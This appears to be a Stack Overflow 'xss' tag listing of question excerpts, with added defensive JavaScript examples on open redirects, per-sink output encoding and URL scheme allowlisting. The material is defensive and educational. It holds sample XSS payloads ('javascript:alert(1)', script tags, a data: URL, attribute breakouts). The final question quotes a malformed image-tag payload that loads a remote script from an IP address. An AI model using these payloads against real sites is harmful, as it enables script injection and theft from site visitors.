xss

Gracefully closing a frame (toolbar) around an iframe

I've created a tool that is used with a fairly popular music retailer. The tool provides an enhanced search feature (transparent last.fm results, no ads, no lameness, nothing creepy) and I've found the most useful and unobtrusive way to display the search is as a toolbar using the much maligned iframe. This allows users to load search w...

HTML/Javascript app that runs on the filesystem, security issue

I'm putting together a little tool that some business people can run on their local filesystems, since we don't want to set up a host for it. Basically, it's just HTML + Javascript (using jQuery) to pull some reports using REST from a 3rd party. The problem is, FF3 and IE don't allow the ajax call, I get: Access to restricted URI denied...

Should I sanitize HTML markup for a hosted CMS?

I am looking at starting a hosted CMS-like service for customers. As it would, it would require the customer to input text which would be served up to anyone that comes to visit their site. I am planning on using Markdown, possibly in combination with WMD (the live markdown preview that SO uses) for the big blocks of text. Now, should ...

HTTP input filter like mod_security for WebSphere?

Does WebSphere offer an HTTP input filter / firewall like mod_security? I know that it's possible to have Apache be the HTTP server front-end to WebSphere, but that type of configuration is beyond my influence. We're stuck using just what WebSphere itself can do. EDIT - To clarify, I am not looking for authentication, authorization, o...

Why does this remote script cause IE6 to hang?

Please take a look at the HTML listed below and let me know why IE6 freezes when trying to load the remote script (located at 'http://code.katzenbach.com/Default.aspx'). The script returns JSONP and executes the 'callbackFunction' listed in the header. When it runs correctly, you'll see a pop-up alert showing numbers 1-500. This works...

Does this set of regular expressions FULLY protect against cross site scripting?

What's an example of something dangerous that would not be caught by the code below? EDIT: After some of the comments I added another line, commented below. See Vinko's comment in David Grant's answer. So far only Vinko has answered the question, which asks for specific examples that would slip through this function. Vinko provided...

Strict HTML Validation and Filtering in PHP

I'm looking for best practices for performing strict (whitelist) validation/filtering of user-submitted HTML. Main purpose is to filter out XSS and similar nasties that may be entered via web forms. Secondary purpose is to limit breakage of HTML content entered by non-technical users e.g. via WYSIWYG editor that has an HTML view. I'm ...

Best way to handle security and avoid XSS with user entered URLs

We have a high security application and we want to allow users to enter URLs that other users will see. This introduces a high risk of XSS hacks - a user could potentially enter javascript that another user ends up executing. Since we hold sensitive data it's essential that this never happens. What are the best practices in dealing wit...

Can you find the web security issue here?

I have a webpage that redirects to another webpage like this: http://www.myOtherServer.com/Sponsor.php?RedirectPage=http://mylink.com/whereIwasgoingtogo.html Then the Sponsor.php page displays an ad with a link saying "Continue to your page" that links to the passed in RedirectPage. Are there security/spoofing issues that could come ...
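The usual name for the issue in this question is an open redirect: whatever is passed in `RedirectPage` ends up as the target of the "Continue to your page" link, so a phisher can hand out a link to the trusted interstitial that continues to a site of their choosing, and if the parameter is echoed unescaped it is also a reflected XSS sink. The added example below is not from the question or from any real Sponsor.php; it checks the parameter with the browser-standard URL parser against a host allowlist before building the link. The host names `www.myOtherServer.com` and `mylink.com` are the ones in the question, the allowlist policy itself is an assumption.

```javascript
// Added example (not the question's code): validate a RedirectPage-style
// parameter before echoing it into a "Continue" link.
// Assumptions: the interstitial is served from www.myOtherServer.com and
// only mylink.com (plus the interstitial itself) is a legitimate target.
const INTERSTITIAL_ORIGIN = 'https://www.myOtherServer.com/';
const ALLOWED_HOSTS = new Set([
  'mylink.com', 'www.mylink.com', 'www.myotherserver.com', // parser lowercases hosts
]);

// Returns a canonical absolute URL string if `raw` may be redirected to,
// otherwise null. Uses the WHATWG URL parser rather than a regex so that
// "//evil.com", backslashes, embedded tabs, case tricks and credentials
// are all normalised the same way the browser will normalise them.
function safeRedirectTarget(raw, allowedHosts = ALLOWED_HOSTS) {
  if (typeof raw !== 'string' || raw.length > 2048) return null;
  let url;
  try {
    // Resolve relative paths against our own origin so "/page" stays on-site.
    url = new URL(raw, INTERSTITIAL_ORIGIN);
  } catch {
    return null; // unparseable input is simply refused
  }
  // Only web schemes: rejects javascript:, data:, vbscript:, file:, ...
  if (url.protocol !== 'http:' && url.protocol !== 'https:') return null;
  // Exact host match: "mylink.com.evil.com" and "mylink.com@evil.com" fail,
  // because the parser reports evil.com as the hostname for both.
  if (!allowedHosts.has(url.hostname)) return null;
  // Drop userinfo so the displayed link cannot carry confusing "user:pw@".
  url.username = '';
  url.password = '';
  return url.href;
}

// Minimal encoder for a double-quoted HTML attribute value.
function escapeAttr(s) {
  return s.replace(/[&<>"']/g, (c) =>
    ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c]));
}

// Builds the "Continue" link; falls back to the interstitial's home page
// when the parameter is rejected. The href is attribute-encoded even though
// it passed validation: validation and output encoding are separate steps.
function continueLink(raw) {
  const target = safeRedirectTarget(raw) || INTERSTITIAL_ORIGIN;
  return `<a href="${escapeAttr(target)}">Continue to your page</a>`;
}

// Constructed sample inputs, as an attacker might supply them.
for (const candidate of [
  'http://mylink.com/whereIwasgoingtogo.html', // legitimate
  '//evil.com/x',                              // scheme-relative
  '\\\\evil.com',                              // backslashes act as slashes
  'https://mylink.com.evil.com/',              // suffix confusion
  'http://mylink.com@evil.com/',               // userinfo confusion
  'javascript:alert(1)',                       // script scheme
]) {
  console.log(JSON.stringify(candidate), '->', safeRedirectTarget(candidate));
}
```

The host allowlist is the part that makes this an anti-open-redirect check rather than just an anti-XSS one: an `http(s):` scheme check alone would still let the interstitial forward users to any site on the internet.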

Logging a user out for a single web application page

This is an extension of my earlier XSS question. Assuming that there isn't a Regex strong enough to guarantee XSS safety for user entered URLs I'm looking at using a redirect. (Although if you do have one please add it under the other question) We have user input web addresses, so: stackoverflow.com They want a link to appear fo...

Sanitize output in rails

What is the best solution to sanitize output html in rails (to avoid XSS attacks)? I have two options: white_list plugin or sanitize method from Sanitize Helper http://api.rubyonrails.com/classes/ActionView/Helpers/SanitizeHelper.html? For me until today the white_list plugin worked better and in the past, Sanitize was very buggy, but as...

What are the best options for non-malicious cross site scripting?

I want to write a browser based app that retrieves data from multiple websites and posts it to my server app. What are the best options to do this? The most straightforward approach would certainly be to have the server app retrieve the data, but that's not possible for copyright reasons. In my case individual users do have the right to...

Cross Site Scripting and HTML Encoding

If I HTML encode any data entered by website users when I redisplay it, will this prevent CSS vulnerabilities? Also, is there a tool/product available that will sanitize my user input for me, so that I don't have to write my own routines. ...

HTML encode user input when storing or when displaying

Simple question that keeps bugging me. Should I HTML encode user input right away and store the encoded contents in the database, or should I store the raw values and HTML encode when displaying? Storing encoded data greatly reduces the risk of a developer forgetting to encode the data when it's being displayed. However, storing the en...
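The trade-off in this question comes down to one fact: HTML entity encoding is correct for exactly one sink, an HTML page. The same stored value usually also flows into a JSON response, a plain-text e-mail, a CSV export or an inline script block, each of which needs a different escaping (or none). The added example below is not from the question; it keeps raw input in a stand-in in-memory store and encodes at each output boundary, then shows what goes wrong when the encoded form is stored instead. All function names and the store are illustrative.

```javascript
// Added example (not from the question): store raw, encode per output sink.
// The array is a stand-in for a database table (assumption).
const db = [];
function saveComment(raw) { db.push(String(raw)); return db.length - 1; }
function loadComment(id) { return db[id]; }

// Encoder for HTML text content and double-quoted attribute values.
function encodeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) =>
    ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c]));
}

// Sink 1: an HTML page. Encode at the moment of rendering.
function renderHtml(id) {
  return `<p class="comment">${encodeHtml(loadComment(id))}</p>`;
}

// Sink 2: a JSON API body (application/json). JSON escaping only;
// HTML entities here would corrupt the data for every API client.
function renderJson(id) {
  return JSON.stringify({ comment: loadComment(id) });
}

// Sink 3: JSON embedded inside an inline <script> block. JSON.stringify is
// not enough on its own because "</script>" inside a string literal still
// terminates the script element, so escape the angle brackets as \uXXXX.
function renderInlineScript(id) {
  return JSON.stringify({ comment: loadComment(id) })
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Sink 4: a plain-text e-mail or log line. No encoding at all.
function renderText(id) { return loadComment(id); }

// The alternative design from the question: encode once, on the way in.
function saveEncoded(raw) { return saveComment(encodeHtml(raw)); }

// Constructed sample inputs: a classic payload and an innocent string.
const hostile = saveComment('<script>alert(1)</script>');
const friendly = saveEncoded('Tom & Jerry');
console.log(renderHtml(hostile));         // entities, script does not run
console.log(renderText(hostile));         // raw text, right for e-mail
console.log(renderInlineScript(hostile)); // no literal </script> in output
console.log(renderHtml(friendly));        // double-encoded: page shows "&amp;"
console.log(renderText(friendly));        // entity leaks into plain text
```

Storing the encoded form does remove the "forgot to encode" failure mode for the HTML sink, but it moves the bug elsewhere: every non-HTML consumer now receives entities, and re-encoding at render time double-encodes. The usual answer is to keep the raw value and make encoding the default in the view layer (which is what Rails' and ASP.NET's later templating defaults do), so that forgetting it requires an explicit opt-out.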

Is it possible for a XSS attack to obtain HttpOnly cookies?

Reading this blog post about HttpOnly cookies made me start thinking, is it possible for an HttpOnly cookie to be obtained through any form of XSS? Jeff mentions that it "raises the bar considerably" but makes it sound like it doesn't completely protect against XSS. Aside from the fact that not all browsers support this feature properly,...

Is there a single resource on the web that lists all ASP.Net security issues (XSS, etc) with preventative measures?

With so many ways to attack a site, it would be useful if there is a single guide, or resource, listing all known vulnerabilities with possible preventative measures. Does anyone know of any? Also, is there a library or framework that can deal with this kind of thing? ...

Build "exit" page using Classic ASP avoiding major Cross Site Scripting pitfalls

I'm working on updating a classic ASP web page used by a number of sub-sites maintained at the company I work for. The purpose of the page is to notify the user that they are leaving "our" site and going to another site. It's basically a disclaimer, but due to resource limitations and time limitations I can't add the disclaimer to every...

How does XSS work

Can someone explain how XSS works in plain english? Maybe with an example. Googling didn't help much. ...

Cross-site scripting from an Image

I have a rich-text editor on my site that I'm trying to protect against XSS attacks. I think I have pretty much everything handled, but I'm still unsure about what to do with images. Right now I'm using the following regex to validate image URLs, which I'm assuming will block inline javascript XSS attacks: "https?://[-A-Za-z0-9+&@#/%?...
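Three questions on this page ("Best way to handle security and avoid XSS with user entered URLs", "Logging a user out for a single web application page" and this one about image URLs) are the same problem: a user-typed address ends up in an `href` or `src` attribute, and the only thing that must never get there is a non-web scheme such as `javascript:`, `data:` or `vbscript:`. A pattern like `https?://...` applied with `.test()` and no `^...$` anchors only proves that an http URL occurs somewhere in the string, and a regex also has to re-implement every normalisation trick the browser's URL parser already knows (case, embedded tabs and newlines, `//host`, userinfo). The added example below is not from any of the questions; it uses the WHATWG `URL` parser to accept only `http:`/`https:`, adds a scheme to bare hostnames like `stackoverflow.com`, and contrasts it with an unanchored regex of the same style. That regex is my own stand-in for illustration, not the asker's expression, and all function names are illustrative.

```javascript
// Added example (not from the questions): scheme-allowlist a user-typed URL
// with the URL parser, then attribute-encode it into href / src.
const ALLOWED_SCHEMES = new Set(['http:', 'https:']);

// Returns a canonical URL string, or null if the input must not be linked.
function safeUserUrl(input) {
  if (typeof input !== 'string' || input.length > 2048) return null;
  let url;
  try {
    url = new URL(input); // has an explicit scheme, possibly a dangerous one
  } catch {
    try {
      url = new URL('http://' + input); // bare host like "stackoverflow.com"
    } catch {
      return null;
    }
  }
  // The parser lowercases the scheme and strips tabs/newlines first, so
  // "JaVaScRiPt:" and "java\tscript:" both arrive here as "javascript:".
  if (!ALLOWED_SCHEMES.has(url.protocol)) return null;
  url.username = ''; // no "user:pw@" in displayed links
  url.password = '';
  return url.href;   // canonical form: host lowercased, quotes percent-encoded
}

// Stand-in for an unanchored "https?://..." style check (hypothetical).
const LOOKS_LIKE_HTTP = /https?:\/\/[-A-Za-z0-9+&@#/%?=~_|!:,.;]*[-A-Za-z0-9+&@#/%=~_|]/;
function regexAccepts(input) { return LOOKS_LIKE_HTTP.test(input); }

function attr(s) {
  return s.replace(/[&<>"']/g, (c) =>
    ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c]));
}

// Rejected addresses are shown as plain text rather than linked.
function linkHtml(input, text) {
  const href = safeUserUrl(input);
  if (href === null) return attr(text);
  return `<a href="${attr(href)}" rel="noopener noreferrer">${attr(text)}</a>`;
}

// Rejected image addresses produce no element at all.
function imgHtml(input) {
  const src = safeUserUrl(input);
  return src === null ? '' : `<img src="${attr(src)}" alt="">`;
}

// Constructed sample inputs.
for (const s of [
  'stackoverflow.com',
  'javascript:alert(1)',
  'JaVaScRiPt:alert(1)',
  'java\tscript:alert(1)',
  'data:text/html,<script>alert(1)</script>',
  'javascript:alert(1)//http://a.com', // passes the unanchored regex
  'http://example.com/"onerror="alert(1)',
]) {
  console.log(JSON.stringify(s), 'regex:', regexAccepts(s), 'parser:', safeUserUrl(s));
}
```

Two things the parser gives for free that the regex does not: the returned string is canonical, so the same host always compares equal, and characters such as `"` in the path come back percent-encoded. The `href` is still attribute-encoded on output, because scheme validation says nothing about the context the value is written into.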

XSS Torture Test - does it exist?

Hi, I'm looking to write an HTML sanitiser, and obviously to test/prove that it works properly, I need a set of XSS examples to pitch against it to see how it performs. Here's a nice example from Coding Horror <img src=""http://www.a.com/a.jpg&lt;script type=text/javascript src="http://1.2.3.4:81/xss.js"&gt;" /><<img src=""http://www....